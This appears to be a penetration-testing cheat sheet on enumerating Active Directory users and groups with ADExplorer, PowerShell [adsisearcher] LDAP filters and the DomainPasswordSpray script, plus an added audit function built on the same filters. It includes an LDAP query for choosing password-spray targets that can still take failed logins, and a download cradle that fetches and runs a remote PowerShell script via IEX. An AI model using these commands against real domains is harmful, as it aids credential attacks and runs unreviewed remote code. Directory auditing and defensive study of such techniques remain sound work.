Enumerate Users & Groups

ADExplorer

Perform recon from a computer outside the domain using credentials of a standard user. See the SysInternals page for details.

adsisearcher

Lets you run any standard LDAP query against the Active Directory database straight from PowerShell, with no extra module required.

Enumerate Users
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*))").FindAll().Properties.samaccountname

Combine this base query with other useful LDAP filters to fine-tune your search:

Filter                                                              Description
userAccountControl:1.2.840.113556.1.4.803:=2                        Disabled account
!(userAccountControl:1.2.840.113556.1.4.803:=2)                     Enabled account
userAccountControl:1.2.840.113556.1.4.803:=65536                    Password never expires
badpwdcount<=[LOCKOUT THRESHOLD - 2]                                At least 1 failed attempt left (get lockout threshold)
admincount=1                                                        Objects protected by AdminSDHolder (what is that?)
memberof=CN=Domain Admins,CN=Users,DC=domain,DC=example,DC=org      Member of Domain Admins

Example for password spray:

([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(badpwdcount<=1)(userAccountControl:1.2.840.113556.1.4.803:=65536)))").FindAll().Properties.samaccountname

Reference: https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx
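As an added example (not part of the original page), the following function runs the filters from the table above as an account-hygiene audit through [adsisearcher], with paging enabled so the server's 1000-result cap does not silently truncate output; the function name, its parameters and the default lockout threshold of 5 are assumptions.

```powershell
# Added example, not from the original page: runs the LDAP filters from the
# table above against the current domain and reports matching accounts.
# Assumes a domain-joined session (or one holding domain credentials) and
# PowerShell 3 or later.
function Invoke-AdAccountAudit {
    param(
        # Base DN to search; defaults to the current domain's root.
        [string]$SearchBase = ([adsi]'LDAP://RootDSE').defaultNamingContext,
        # Assumed default; read the real value from the domain lockout policy
        # before trusting the badPwdCount check.
        [int]$LockoutThreshold = 5
    )

    # Base user clause and the filters from the table, keyed by meaning.
    $userBase = '(objectCategory=person)(objectClass=user)(samaccountname=*)'
    $checks = [ordered]@{
        'Disabled account'           = "(&$userBase(userAccountControl:1.2.840.113556.1.4.803:=2))"
        'Password never expires'     = "(&$userBase(userAccountControl:1.2.840.113556.1.4.803:=65536))"
        'Protected by AdminSDHolder' = "(&$userBase(admincount=1))"
        'Failed logon headroom'      = "(&$userBase(!(userAccountControl:1.2.840.113556.1.4.803:=2))(badpwdcount<=$($LockoutThreshold - 2)))"
        'Domain Admins member'       = "(&$userBase(memberof=CN=Domain Admins,CN=Users,$SearchBase))"
    }

    foreach ($name in $checks.Keys) {
        $searcher = [adsisearcher]$checks[$name]
        $searcher.SearchRoot = [adsi]"LDAP://$SearchBase"
        # Without paging, results are capped at the server's MaxPageSize (1000).
        $searcher.PageSize = 1000
        # Only pull the attributes we report on; keeps the query cheap.
        $searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'description'))

        $results = $searcher.FindAll()
        [pscustomobject]@{
            Check    = $name
            Count    = $results.Count
            Accounts = @($results | ForEach-Object { [string]$_.Properties['samaccountname'][0] })
        }
        $results.Dispose()
    }
}

# Usage: Invoke-AdAccountAudit | Format-Table Check, Count
```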

Enumerate Groups
([adsisearcher]"(&(objectClass=group)(samaccountname=*))").FindAll().Properties | % { Write-Host "$($_.samaccountname) : $($_.description)" }

DomainPasswordSpray.ps1

Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts

Note: load the script into the current session first, for example with the download cradle below:

IEX (New-Object System.Net.WebClient).DownloadString('https://github.com/dafthack/DomainPasswordSpray/raw/master/DomainPasswordSpray.ps1')

Reference: https://github.com/dafthack/DomainPasswordSpray#get-domainuserlist-module